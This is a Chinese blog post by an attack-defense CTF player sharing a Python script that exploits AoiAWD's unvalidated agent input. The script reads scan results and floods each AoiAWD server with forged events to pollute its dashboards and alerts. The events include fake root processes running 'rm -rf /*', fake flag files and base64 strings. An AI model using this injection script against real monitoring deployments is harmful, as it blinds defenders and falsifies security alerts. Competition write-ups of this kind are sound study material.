AoiAWD 反制脚本

起因

在经历过 awd 比赛中 AoiAWD 多次崩溃后(长城杯 虽然最后还是进决赛摸鱼了)

赛后研究了一下

开发了这个反制脚本

由于打点队友喜欢用 gogo

所以这个脚本支持 gogo 扫描结果

思路

发现后端未验证来自靶机的数据

因此存在脏数据污染

针对此开发脚本

可向 AoiAWD 的各个数据展示页面投放脏数据

包括告警页面

脚本

再此公布本脚本,希望下次 awd 遇见的时候别打我,谢谢 QAQ

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
import re
import socket

f = open("./ip.txt", "r+")
url_list = f.readlines()

for i in url_list:
    pattern = r"tcp://(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d+)"
    match = re.search(pattern, i, 0)
    if match:
        i = match.group(0).split("//")[1]
        p = int(i.split(":")[1])
        i = i.split(":")[0]
        server_address = (i, p)  # 替换SERVER_IP和SERVER_PORT为实际值
        data = '{"type":"ping"}\n'
        data2 = '{"type":"new_process","data":{"pid":"114514","ppid":"114514","uid":"0","username":"root","cmd":"rm -rf /*","param":"su root rm -rf /*"}}\n'
        data3 = '{"type":"file","data":{"path":"/update/score_points","mode":33188,"event":256,"size":114514,"content":"ZmxhZ3tDcmF6eV9UaHVydGhkYXlfdl9tZV81MH0="}}\n'
        data4 = '{"type":"web","data":{"scipt":"/var/www/html/rce.php","method":"post","uri":"127.0.0.1/rce.php","remote":"127.0.0.1","buffer":"{\\"flag\\":\\"flag{Crazy_Thurthday_v_me_50}\\"}"}}\n'
        data5 = '{"type":"pwn","data":{"file":"catflag","type":"stdin","pid":"123","maps":"su root rm -rf /*"}}\n'
        data6 = '{"type":"pwn","data":{"file":"catflag","type":"stdin","pid":"123","maps":"su root rm -rf /*"}}\n'
        data7 = '{"type":"file","data":{"path":"/114514","mode":33188,"event":256,"size":114514,"content":"c3Ugcm9vdCBybSAtcmYgLyo="}}\n'
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            try:
                sock.settimeout(1)
                sock.connect(server_address)
                sock.sendall(data.encode("utf-8"))
                tmp = sock.recvfrom(1024)
                if "pong" in str(tmp):
                    sock.sendall(data2.encode("utf-8"))
                    sock.sendall(data3.encode("utf-8"))
                    sock.sendall(data4.encode("utf-8"))
                    for j in range(60):
                        sock.sendall(data7.encode("utf-8"))
                    sock.sendall(data6.encode("utf-8"))
                    sock.sendall(data5.encode("utf-8"))
                    print(f"[+] {i}\n")
                    sock.close()
                else:
                    print(
                        f"\n[-] --------------------------------{i}-------------------------------------\n"
                    )
            except Exception as e:
                print(f"An error occurred: {e}")

Next

由于分析了各个 AWD 防御工具(Aoi、wathbird 等)

决定模仿 aoi、并借鉴其他各个工具

重写一个基于 go(gin 或 iris 大概率会用 gin)的 AWD 监测防御系统

但是目前没有时间开发(别问,问就是鸽)

预计会在 2025 年 5 月问世 :)

如果师傅们有留存的各个 AWD 比赛的流量等数据

以及分析了解过官方 check 机制的师傅

以及有大量参加 AWD 经验的大师傅

欢迎联系本菜鸡